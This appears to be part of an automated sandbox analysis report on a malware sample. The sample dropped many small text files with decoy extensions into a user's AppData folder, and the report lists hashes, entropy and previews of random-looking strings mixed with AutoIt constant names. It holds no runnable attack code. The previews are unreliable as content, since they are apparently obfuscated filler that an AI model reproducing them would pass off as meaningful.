                                                                                            Preview:76B50HdN9LH2M4hCwRk5D4F5gJLbK59v3U..Jzdq14zk9D982L61t549624e6x5741pTwPkpRB97O9496Sg..H876PirD861N0kB82A6IC5o27iwve2m9O0F711hzT4yLaisx3b615X73lh1ez9251909DEX67..358D860c0eW4..K22qIP0NTJV0R2P99l63Nj03Fse09341o6L42uc1oj40b1fc19Ge2T255dVq131OE7X2009c1X5eNF6C..j0TU47iUwd11427M691vtu1y7kMthX55z175k..6ya24QG5D055lA893718W79u81xVlU0TAf31Z44rqX872e1pP2Z56914..4E6Tv5K4h6G1u90lz07yB0B8..9l611lvD3Pi7guY11621g8uB2I18kPP2252U56j7p65rHp3mp138F5B7Y892255cO5t20025524..1LEo9xW63wTSD3B8364u3387vN7jRV4jDTl23PyB869q0..521shUh234NU14C6w0ml610qtQNt00mGGU4gf909D2w5W1X3x156ucay0x809B5..64H4i40Wxs5VZVa46N86lpx49Nosj75L1P17hXp8cE832q6600r30ipE7l8K..5du76V11K79DzM148F0Nju10dcVP01g7F586H73l00Xc511U66r09D91R4WT92l3YVIm6tV86Ch0F..a0Oj3js27YP46RH75k50tKLA7z95sU3jL9860x04645Gyj945..U58e3jA8adHs4iK591E64qUZ08F5L6S30V3r6Em63V1U8069jdLOT0Ot50vpMUt7o23..V1K9JNg7514JuonYnRmO8314V5X2W4R1K9ivf04QxxpaA04WzKMflX09374o0w8G3U84050jiA89mDc48rB07EF..7a1e30r7z64mCNad535K030d12cQY425I..8XKtt38UBh13641540Y0b5VK40D94t77On..1DFE58M6700

                                                                                            C:\Users\user\AppData\Roaming\uhex\dsdotsbbp.bin

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):629
                                                                                            Entropy (8bit):5.5898930784774326
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:xABiiM8SerU43KkkhZHVvu52jBVX8Cy55x:aB+De4dkkhZHVLTW5/
                                                                                            MD5:0315FD901CCB2B49F01141D429B4ADF1
                                                                                            SHA1:95B010DC431B7D801A95ACE04A3DE96345C0F4CE
                                                                                            SHA-256:49F72C6045B94026EDA1BA6246267F24E24DF1DEA2136880EA46432609DD515C
                                                                                            SHA-512:14E2EA60D54635447D5A3521EEDDE5CF100504DB6165EF24C15577A3F5EE5215E43085317B4AEAE9CE72E57343F1015D3CDEE943B638F4F1F28405D218593E38
                                                                                            Malicious:false
                                                                                            Preview:5m7oyq4Q4w87GYa5wvpYV8ceGQ5k1RJjkyw7715XB9H0L9633P76364D8Ycf5346eiT5F6g3n544S0oTa9h7WkRr0qG21G8GN1257ApG12z..BorderConstants ToolTipConstants..96nx32Ki3y2WM81Df09dk13gL3rZ9shtHbsTyE38B82g79x4cg5S147my593b1399ZMd82438u41..ButtonConstants ColorConstants..g824T57140hF428j0Yk2k25U61og6..GuiDateTimePicker ButtonConstants..Lo60bQ947c905A7kan5Y9L4nW678c1L54RYXTE151r93l86P38w78c..GuiDateTimePicker ToolTipConstants..toJlJc2b18..ToolbarConstants ToolTipConstants..AFo38M82283A4bdx8o88051y62oR7995VqOIFu913fpa4538a42KkY1oL4NlC9HPD50hfUcp6Ug14Ki86Jn48FD1DnvqG712b4E77PUqYB3aSHH3TV37M16Hu5QJ9eFPPZpKe..DateTimeConstants ToolTipConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\hunhencl.mp3

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):530
                                                                                            Entropy (8bit):5.600593122971033
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:MwlgeDviuLKBPNPQCf4meD9OVHZskqWkuXhPCeC:M8geDvR27QCQh9OVHZYmpK
                                                                                            MD5:9A22CA5B264C0A6ECEE461D36F62E4D5
                                                                                            SHA1:55727E8B228357474BB020CF53DCC2E300E3C905
                                                                                            SHA-256:0453786E4813E894414E1CBE7D482129A96473EF7939FFF39C364D398B1D131F
                                                                                            SHA-512:65C8F7AFC1925F3CD9185CBF5708B3C4B0EA68C23E208108DA9F1FA414420A0D25FC360158E506140FA21FBA0872FD857BD1FE3A27A778B0EDF0D431653CA38D
                                                                                            Malicious:false
                                                                                            Preview:Kg3lG36l4JYT32mBE5orySV5W1kY59y1y9o00oH6NKk146wLw2413zNo8qL5680w1RTRFe7g5H4Ni105U4dCuBV8o9K7vh6Z10ih7jxAtQZOF9o5CI741hk9470uc3eL9rE..ColorConstants TreeViewConstants..5O2O8C50bU380Z3Q..DateTimeConstants BorderConstants..A7JNjM1pir9H4W53nD9I84T7l1mRGa003F31fZgvNrb64r4n49qeXxw010309SMIe81k6926y0vqen8726yZ5m2T8x92M7oc34PVj7gbakPB538f0c1RE..DateTimeConstants FileConstants..jv0w0o49d372sg6oC63CyCL71noxn9G8s159r912Y0N021396D1p1I39qzC08G80a704b1M1Ri22n5xvhy8681L0F056537Dg8p9W52tH2m9K493fI05pFI5p3W32x1..FontConstants FileConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\jfdaneanim.3gp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):509
                                                                                            Entropy (8bit):5.567658950639442
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:FoZBgtrRYCQcgtLIp76fjGvaGi06PRsmeGs1IWUPv1RV9W0cygmbnXTR+uoJ:sBmRnJgtEwf0aGQPM7UPNz9zvs
                                                                                            MD5:05A4FBE577E79C7A358EF0EB93B9E59D
                                                                                            SHA1:FEEE8CE13F505151B4CBC06C14103120AF6C8B7E
                                                                                            SHA-256:46240079BD35DAEE9A5C08DD6A41C9C9A8C212BEBB1B908D38C507B745B7469A
                                                                                            SHA-512:83D10AB864E900EA23F340515B35335E58C4CE11E45CD515A85FF25C928FFCE568A78951ABF6EB9BB677E4A282B765E5540969F8FAB37B921D9792A1539E4587
                                                                                            Malicious:false
                                                                                            Preview:G9h9It8W350V28u9LX9a0w59gc549Uww3X11Bz77VE8lmlg7EH94Dw884eX892Nhh94EKPv8ClF690rw8X01792m5CxjI01u20624t7d..GuiDateTimePicker ToolTipConstants..s6j5G4552WJZ5096kfS2Uw91rCJd1rm5046c2n4K25XAaJXkA45Hwe962ksAh9XS7581z670528H475v5231prFD34i7l96S1G7w300l8QK91Cf567S95ZAH31x830YQmOm9oT5..StructureConstants FontConstants..8X92R0i795jYE4M1L07h891b6051s09y7rcV7H26X19ej7371607B6eC4g70q65ax66cjE389W170Yw6561..ColorConstants ColorConstants..37b1S6Brr6L4gNr72CP4p0803934FyF3N283w8O8y3..GuiDateTimePicker ToolTipConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\jwhw.docx

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):548
                                                                                            Entropy (8bit):5.602005193296017
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:F/pRkjNwngeSQSCpRdO47oXVcw/hSij/gaIrRoO0:4w4QSodQnDLgRl0
                                                                                            MD5:B2D1AF0A1DCE066BD35F19455195AA1B
                                                                                            SHA1:933A554E528CF2C18FF7172D49798B7327D1A498
                                                                                            SHA-256:5F4ABDF30A4E850FC0C8A8FFE2B63E111C9B9FC21C8FED903A4310770FF9543A
                                                                                            SHA-512:F143C4773C6554E103EE78E00282B4F24896EF588A00BBB432530DAB24C75520668F74C2959DD247E7FD1838CFF5184429D38B04338C39C78DE41446647CBFED
                                                                                            Malicious:false
                                                                                            Preview:276Ja8ZQN3414UG553TDFkvTZN84fhZ1ka5g2q559g6013sA4Ii9so7w1hm2339l6NVf6r4jx95fNq0kQ80P4694q8G4J5SY6Doka9X398hW90Yr7KXb0FV..ColorConstants StructureConstants..D69H5M3865R50622FMP9tf31028289q4Q4ZV67704D3D81283u0jW47w03ASI46D21g5pZ58Fa0GNuKu9yyqXIqL2Jna64mNIU77M8JZZz28075HG9c7895qwwroVu0Q9ME7Rgm9Z8..ButtonConstants BorderConstants..2U1ySHl..FontConstants ComboConstants..3PM68SwA68k02h14hSI48I5092mE9e0gVXQ3R97B7vJM4vV47225OBn5OW707643Dx334C67717jQ652p7gxC859y30ndp5Wen43I3k00RKJ5195G617pu176rZuw7fOHwUM9m88436fDFOM3..UpDownConstants BorderConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\kdnawtnapj.docx

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):681
                                                                                            Entropy (8bit):5.578131106909567
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:VfZkk4dqssyizVF0XoofFPhvHIypRIvsnSbU04WT5weieRc:5Z4dqtBqhDRp+vsB0FTu2c
                                                                                            MD5:115410CD760DA5C5F22164BC105494AD
                                                                                            SHA1:B479CD74BDC8B87C180DF8C2D2F358029E364128
                                                                                            SHA-256:C84D1ABF386DF307DEE27F88B3CB79778C065670E5AE0F8E9AF19FE6802BC817
                                                                                            SHA-512:1AB3D8CADAA63F56013C14325EDA811DF36F8C3E2BC4F3635B7809F477D1E063F623BDC02262F570730D40014D9D2AB81F79E03C58D8EDDD9923B3794641A9BF
                                                                                            Malicious:false
                                                                                            Preview:fw8a830geUG71p56J77lh8fti7j8I0Q1ec8h6J2M4ygwW9HZ5dGP4zH1F2144lv52p30266i9369yj0tt18sY4BgB76Z60h40hr9z61zd6FlG9xa0cP058M11U8t5Q2C0SvIQ6613G463UZh6751..ComboConstants ButtonConstants..4G35FmRe5380275g6jw..ColorConstants DateTimeConstants..1724y1895C6v05S71RhCO6t4Ky28b8938U802394852Q7ef46D2rWln8..TreeViewConstants FileConstants..ICLeJT366825I09504HLg369Q2Q8rn59O5A4W6LMDm0Q41eA841e21i767g873k4178Dr9DhHT2NM3xk794Q4B71Zc1ld8G0GQ03t84h99Y31t30tZfpA4y1WLd42C9Gq31..GuiDateTimePicker ToolbarConstants..gSYh9222e1r2g61Ny3IKd90FR0hPDi5iVY14jfE1gfME9p3G4n37Qdjq2RiW8izV98nPp14fyY3a1GRW95c5S56r932550P00012Ok447Cby3hu1422vv40p544f3KXw0D655tts04403F620J..BorderConstants StructureConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\kdpd.txt

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):595
                                                                                            Entropy (8bit):5.593649010432797
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:n9aRfQoVUDr8RjumIkJoku2sfhfTwmauWLaH:nwRPVU/A9/Joku1fhrzWLaH
                                                                                            MD5:3979B23CD576BF0B1A0B7CB0142A773C
                                                                                            SHA1:9D76D532DB300F48FE3C70986B781DA754C5ECAB
                                                                                            SHA-256:E256058875DFBD6390C34CEE57C0869CED6709AF301F33785D8E766CC90A2F62
                                                                                            SHA-512:87F4368361122D5027527793E61609B2E01DC943756087FC391D2FDB70E0015301A0B93CE027F31B3A18F1DF053B96DC91857385DF950007F29008C33067A199
                                                                                            Malicious:false
                                                                                            Preview:919F5lgk360MVB4k0IR061IVwY37Y82G3Wp2S5v8n1UM53T8P1DW423V1Qay28mpM871O6d5A369gZ5774aU42f1850PDN8617q016Bn37qu7854843yzGeg4454fM058bF3t81W1i04tG7vl8w29R0XdwAi994rbA3..DateTimeConstants UpDownConstants..5P6f0uanoJ009cwJr2q2mt6m132upvH82z9m1Eqh1zf4rS21575257MgqhxM2K3KG9q7OL2178ids7p3262HHizTLdpv..GuiDateTimePicker ToolbarConstants..j23m..ColorConstants ComboConstants..HfO30itrVz6poMd4n0od186RU28o5cW6DX42134..UpDownConstants ButtonConstants..7x6692Qya6963306PMj883gGFb3X2FNzK7919WSK68S1Xm548J69mni8089NTO2w95n07Y3a6do3U6R000xjwUEZ80o3zL823Q70778a5UY1Bq5M993gz61..ButtonConstants UpDownConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\kkvbt.bmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):501
                                                                                            Entropy (8bit):5.5057818995668795
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:2Q0ddyvlAFPIDRxn3aHll8aNRSd1UVA+D+xNSRwR:DkYaIn3+lfSd1UVA+WNiwR
                                                                                            MD5:E6CB1CC46097476D56EE5F3164A63457
                                                                                            SHA1:C8F187E7ADE75D4248265D13470D52222788CA2F
                                                                                            SHA-256:400E5E9D0B52CEE8DDABD8B107BF35E4693BF5C1649DD11EB2EB95DE9752F010
                                                                                            SHA-512:CD2C2309D131D21D9B6EDE0511E042230E1A35E9B45F16C493AF224B7A5F2C1E4560D86F49F308D491A5C7A526A287A741B970698B9B3696C7E6CF9ABCA5D447
                                                                                            Malicious:false
                                                                                            Preview:7Cs7031myu6E8368UTx49geR..ToolTipConstants FileConstants..t85p546IHF68Kd9D15nWa1G3f8g29x5wRAeQLs89yOF..ComboConstants FontConstants..6o9bEb98..TreeViewConstants ComboConstants..7WclP7610E6ja4775pabor0gtMVw438I7yW29d8512X402l6e9yyiWiN8n83V19h4C25cKk7761902373j94eQf8GA32E7996Gkgzk2NP5G9Xf2..ComboConstants StructureConstants..fjoJM95t8A8C9Uq231f2z1qbmkR1109Do9A42sPf490JH447ZEAEL73W57876Xr7Yv3434g4K5wN4CqwT22Fnq14fnO7zP0334478plN6c67OoF31j1Ix890q29w72866AwQrq019ne0..ButtonConstants ToolbarConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\lmhrugakv.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):601
                                                                                            Entropy (8bit):5.541153031604899
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:UCgsEbP5morZ36cIbCTWJ+XPBoHmKzw1Qaic:r1EzskoeTt5ohaic
                                                                                            MD5:F1ABCC364A87497DD1B94B2BA9F28B06
                                                                                            SHA1:079841113779DB42C8433AFE3E21EAB75587D2B0
                                                                                            SHA-256:AC398771A8C4CFCD16EEB684300A0A8BC9BB1718DBE5142B22231D11D73297BB
                                                                                            SHA-512:50BF4F2187E76BC2213518B3114D1C98561949F014ED8A2CF65CD517ED3C5123C77CF4A9497C117F6DE2581ACBBBB12A0BFF76F65EB9566FE5F8FE1FCE3CA498
                                                                                            Malicious:false
                                                                                            Preview:3621o0Q97W8l0u0A4F4A4UC77o3IX6a..ButtonConstants ComboConstants..Ae6X1Xijx8k80n6Vhz8U3Gd22Ni8498d6RNcc918933h87987t..GuiDateTimePicker GuiDateTimePicker..1eqd2sNLx22T2Sf0AI863ZY486RS6212S0TQ75abCu1..DateTimeConstants ComboConstants..U1G2R2q6Ugh9tjQIm110GFeD85TMcWC3q062D6m99MFw329zAb2Jx4r0678C..ColorConstants DateTimeConstants..X7QM9Coa1s318vD07o6J26x93940940lB3vV4gd03W7M7ieixUD80Oi95NW3512H8i7Ng221M01dF0Lil7992g2K1e1u4kEm09YkL51Wb0F6TjiS10TemhH0603Vq50JnX..DateTimeConstants ButtonConstants..2RP020F80W5q0z287m97QD67O4ORSd248pb3Iz29IrLY2rl9sF2IJ9849lcD6Ve13093c8S16O..FileConstants FileConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\lwwlr.pdf

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):544
                                                                                            Entropy (8bit):5.5484089730160235
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:M7JWT9pa36RdOyPix/sDLnG/Z5WqhYdO2SIZHxzg0:QWpc367i6GR5WQYY/Ilxzg0
                                                                                            MD5:CFD1AB5B1F08295EAEE1952DCFB26129
                                                                                            SHA1:D2B897F236483A80DC2F18CFD8CE3EC70D50A4DA
                                                                                            SHA-256:EB7167C0290E39829BAE8CF588B462C1A62A352F742DF0B473653581D78475F8
                                                                                            SHA-512:53386F65A4965ED39342B62791CDBF72DDEFCA668B06A295B714481B66256ED663BDA9C7E58C6F07F067177EA21C0E51726029E4BFDB8AB82A0C2794ED8A7305
                                                                                            Malicious:false
                                                                                            Preview:C9c919116b6JX7431Pt352t65IQ7v9yU2645Z171841JK09eeVcFvCvi3ao332CG524gZlL3Li59w8hsINh4395VK96Y5..FontConstants DateTimeConstants..171T35887h5I9UD43P263PxUt40RLRqA997Q36UgaY08Z2695wQQ51Ryps3QxsNV6636QE90c8059e..TreeViewConstants ToolTipConstants..46ZB5KIigk40XfM1XvtNc7902hSKD00s7MZ3X8ka45..ColorConstants ToolTipConstants..yu67e7s87u0aA0t890M50C2Y08Oz209QRFL8u10ef2W3pU11up6D4c16V7VO8n0380iX9EK1D6qaOR47H9Tl98443AGEV..StructureConstants BorderConstants..FWU3T1cA2CptTWm19O0484b59O265K60N3hIax0w61ht12gQlxl95P51j..ButtonConstants BorderConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\pxljdjreja.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):546
                                                                                            Entropy (8bit):5.565295969884612
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:0fdW2QN8pw4FgJ7pNfqF4labPkmacyjPc:1Jqw4FgJ7C2laLBacf
                                                                                            MD5:99893791863E80DAC839BD63E298A321
                                                                                            SHA1:3BE066F9794E02A49F3B3E14BBD53EF06B03DF54
                                                                                            SHA-256:F29C437FA954DB57B7CB254165A42D7A051C2B9E641517445D14F255C1DCF804
                                                                                            SHA-512:108D65EBFADB99D36291E78973CDEF4266119102378058F24A556CEF7A76E3138BAF827CB69555D43BE70A292F9DA343F174EC01598114C0E992EB580B1E90C2
                                                                                            Malicious:false
                                                                                            Preview:aV1z3h5v0j377FI72Na25IhVv397E255652L2qt8fSyw5449ycJl7aZMIutL300yM0TlO2PlJi72a422eg0rM9s30588mBp5f21X21Y0nR6276lC31415a..ToolbarConstants ButtonConstants..6n3QN6yh3HbU46788N2DN93wG00Uk12l21u640HF50JvY6NEFV505244510yKrjs5sl..ButtonConstants ButtonConstants..5dh6U61b2GR4uTj5kT0S5u7ST27T2v77Shv8D3ZA4IJ41m588Qn8j0..FontConstants ToolTipConstants..C4oS5680xC3f051v3Je0RzzxC90iZ4611674iG1V8TWiYv3732al3S7kK39J7208IgxNOGw59jVzgFA1R..DateTimeConstants BorderConstants..3640312922f4y0r1V4l5CwfySgIp7r341Pml28MS5Nk26..GuiDateTimePicker TreeViewConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\qvvfwf.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):542
                                                                                            Entropy (8bit):5.533057338215279
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:P+p8nZYM05VsjpUL0tqOgpzqVmTVqtP8UvUruEMJQmet:P+pYZMVcUAthgBqVmTVqjUCEMJnM
                                                                                            MD5:5F568406450CA6E8F54D4854F44BAA08
                                                                                            SHA1:4FF87F8BCD93682383C623F97150FBA0D14073F6
                                                                                            SHA-256:1B40FBF413A1026F06BA4963D1E4B61463AC94689191EDED71DB4BFBE602F94A
                                                                                            SHA-512:7E12F544FCAF18D2303191C1CE0014A558A3C46EE7BB69F5EE537A66DCB434CD681BAEB9EDA5B3AEB41346C00F2B1D0EC5ABCFB67E5BB51097B4E349BC928CC8
                                                                                            Malicious:false
                                                                                            Preview:c04UBY65872t6qM4n9z76M9417207s0R5F54fe29NdU4NSs1q0b0WR5UdXC0248U97g27040jDmx5F..ColorConstants ComboConstants..jleLEbilfKZF26s18G9E9Fgv81BR7l8654k2n26q7114238z652bd35tZBss46iSvh4LMQ3a7R645vaHF..ColorConstants ToolbarConstants..972032B6J1p9v07a718gX8Zv97H50Q8NQ9y5q5471V2L2Ih896V..StructureConstants GuiDateTimePicker..oRM56DsNi987Nh27Dh2lW7aDt6s7KJW1QFpeE2A5z80396So4t16X1BX407SiDz99q391L6y56048EcGzP1U465O73xXe1175g..StructureConstants FontConstants..0981v5B058Rfd3R304lv3QAWve7R1v2F6qM9408k732aS333C99x56..DateTimeConstants ColorConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\ratshu.icm

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):501
                                                                                            Entropy (8bit):5.617038791939554
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:XR7zPkW2KKil1qnmTxxmYTRGjl5cbidPy:XR3PxKil1a8TRGzcbD
                                                                                            MD5:889B62021E2A267B499B25A0C53E23D5
                                                                                            SHA1:4D9B7DD624DF58254290942182D07417BEDAC373
                                                                                            SHA-256:A0156B9ED9271943F1748BDD4166E9617AB3190B4A2EE9F70149AA1E956D2849
                                                                                            SHA-512:9F3FD07B7C09AE15A77AD1FB95D354B8F60F9ACD8F3122077B67AD344BC7C820849F3F4C816F6D3CD569B0ED98866A7C89C54A4B2A218FF30B48A2903C8FBB75
                                                                                            Malicious:false
                                                                                            Preview:f4G77efxXR4E87hV515581ABH7aC2B0w6r88BkgN94k41H1946342114LiIu330P13..BorderConstants ButtonConstants..Il463uL43z95i2QU6K5JLxf0lqyvO7SwY9p93525PVOID90vl2wA0c4lG624F01701lXnlDWl0pEB3h129cgSBe87K53fwX5hmsG9254..ToolTipConstants UpDownConstants..TIe6zbM6nd6B2AP828217y0b4q8Ou4F52CMK3CeYy9DZ6dvAXH68AbAO7223553OK3I74ka8p53o5b05511SU5p0U5ACt2788E8o1F142X9J1J18ZP88z490j06jdsXg3678Q3pSdkaF79..FileConstants FileConstants..14quI541qcR2t8Ow6J9n96vDH637v2Oi9iR2951W982xtkE803A..TreeViewConstants ColorConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\rfxsxmmcd.3gp

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):609
                                                                                            Entropy (8bit):5.6077218194238485
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:fU3y1RmqSUaQcBFPIrrUXI5DNpG4XoXgADqe9Rc:fmybmqt6CrrR53NAme3c
                                                                                            MD5:956687CC1E8733BEF44FFE9CF4697121
                                                                                            SHA1:96F4E58C2B8EEA24D9A44E1DE65DF536BC4CF4CE
                                                                                            SHA-256:A730F62C59974CD502EBA3347A48BA16D543360E0D5A45517B881D01F175928F
                                                                                            SHA-512:0A4B15A9C0B2EDD77FDDB971F622EFB0AA08F594F6810286DE9533EC4606CDB5F8DD53B0EB22387F79F1FBFF8FCDBCFA1FA6E2318445AAE3A37C790AC3DD4EA4
                                                                                            Malicious:false
                                                                                            Preview:2864PS6986KPLkp1ilW433d4Y7N1K5GKVy230jJ5c00J1RAM30Z1904847S53z4S2YLld52BNuX0..StructureConstants GuiDateTimePicker..8d48MY55n1K0eis7Cm46R378X3wdiu3k30KTt44H4820gas09F96I50l1d938HlTH91pabj66NdzLqw36d62285Ti58sfa35a63pu72E614RU5o66PQ6qdv8..TreeViewConstants BorderConstants..R25OLm057275zAc1p089F6OD9kr3E43hauL1BF185b81517C1X1N19FhoVvG6tL0PIS1f15GS4I9P22QqIMz60R1B4578G002Vf..BorderConstants DateTimeConstants..O3s0864M1x74D84ZiZ0ut21Y7pkB14J66U6T9R124M85C542V04090R27tsHHt48E94z97lpf21G8QLe7Z13B0768gpkg6A5r1kj0YX9v2rQIS7B422A91oq1X8i4263b6g6P25728Tj60x23g5XLaucNNx1888..StructureConstants StructureConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\rklpmssjnu.msc

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):600
                                                                                            Entropy (8bit):5.561353751432372
                                                                                            Encrypted:false
                                                                                            SSDEEP:6:j5TPQ1R+j5AcXYBTIuWExlTXJPiiwXvZX5a9IKfs1m+wwI3C+yVrIcWUkanb3xbi:lT4uWckx7diiivZXUcm+iC+vUnprumu
                                                                                            MD5:FB4306A9FD5785223D3F4F3BF7031170
                                                                                            SHA1:69DFA4A52E7408BAD2DDB8B274ACC189CA00936F
                                                                                            SHA-256:565049A3EEC63122D5D1B18A7B9BB23B105588E64AD746B9898CEC1896117BC1
                                                                                            SHA-512:C5C33C8D9E6F941582764B099DB7F74D74D3302817A7A65841544EAAF42D6F526456EAFBD68170B885FA51FD4EA494F5C0E8557CC563F1B20FC6B16042DC6EE9
                                                                                            Malicious:false
                                                                                            Preview:4m7Qe3VC9Ky86q36673k56eEXJm1M3u6W8..FontConstants ToolbarConstants..F1XSHeQ263..FontConstants FileConstants..2126g9267WzF7mH0069O8706x2IKP..UpDownConstants UpDownConstants..8q246ToIE648AJL9h3D10Z9GbV1vH8lW4x444JRw6s5I4F5k30iOZ6D0is7A447Bb91h24y92635m9YA3j8113h79V5f7669H87tku8J3VI520Gm8Z0orGrE779B1RT86292vwg8wwd0wj18pyaqmohWb8..FontConstants FontConstants..hD981se5s301z3w796UjT8Wrj593802F0mG545I4C36e3z4lP8rG2e09sOT9bQjV59Y16d5K4598gK72Lk26q1YzK6z3334D63Pdwl..StructureConstants FontConstants..AKrcW5s4qY2VUy7fy7S6244g5X3yk11151v0Sru6724INVU1e08h2u78JSaE2RC5lcGOu..ComboConstants ToolTipConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\subbjsug.icm

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):604
                                                                                            Entropy (8bit):5.55083826124397
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:IcctRm2VE6dGhRq+hjolYFztVDlR0K01Pe5CbSYFoti:chVE6dGfq+rdnlR0KjnYF6i
                                                                                            MD5:8956858CB0E9C18B4868F43F4031F59E
                                                                                            SHA1:EF75A237FC571B5BD7878177E93B3D80D1E115D7
                                                                                            SHA-256:412BFE4F21EE7731B9A2D80289A42C3F30E697EA6C8C9B84D80812B6F7AE0ED7
                                                                                            SHA-512:408A21F95BF7DF423ACA9385E21CDB23501B28011EB17B5E4773ED5E2585D10F14C03AF683CECADCD4C734EE759729E90D0DF6216781B679B78AC2D10B442F75
                                                                                            Malicious:false
                                                                                            Preview:14y4X6fTF9bt137sK0W404ygZ30pJ7R891w65U8IUID9J2Y95MH48H3k7m740..ComboConstants ComboConstants..K0MU95326g5..ComboConstants ToolbarConstants..I2H368vOkC9010G64Jc72az1UgyMJ8s67eYWg2PIHD8e9v397a97dhv3dU1R7Re4Z4I934nL0f4IZ1405M1n652qt..ButtonConstants ToolTipConstants..5Yh77e050A08086e666oWT3K3GSCs37B1491R35x4fUcQ39h15fV0PaZ5m676kUm4kK4Jr60F92HyZ77845S3d3lNnou48Q6QCi98i994579xK83JVivq7..ComboConstants DateTimeConstants..c4FkyF5c6cbq2D8C53c41g096Qv2Mm523A4177PK1dy34r03Ij1CK0dhV7Yi9TTJAM3OLrj328O31TkNO5T5ub6Z160t0ke9R48L1HQj7fx5601m605C5Ek0e47vjpp9yJ97a5985008Nt9DV93w88b..ComboConstants UpDownConstants..

                                                                                            C:\Users\user\AppData\Roaming\uhex\tbkgx.dll

                                                                                            Download File
                                                                                            Process:C:\Users\user\AppData\Local\Temp\RarSFX0\bpqdpksed.icm
                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):523
                                                                                            Entropy (8bit):5.5433905765244615
                                                                                            Encrypted:false
                                                                                            SSDEEP:12:ecNcjfSBPgENRfcFJ9Xj6tvNBtuQq0bIBjP2R:ecdrnKCvN5qMIIR
                                                                                            MD5:2CB1A9030FF973BB16FD0E743D1711C2
                                                                                            SHA1:10D59F3482D85436651F94C205E22479B65B1E2F
                                                                                            SHA-256:D535D2FD3FD07C2153AFDA33FF492BEE0B859927D55D349B6C7758DEF26CBB42
                                                                                            SHA-512:68EC97E03CC744107E4FEF25893DCEB89A28D42B40CA44554BC5E067ADF09E4843D0AD835BC884D3C525ACFDAAF5CDBF020D72A5F333B708D73C0FA01FDC1F15
                                                                                            Malicious:false
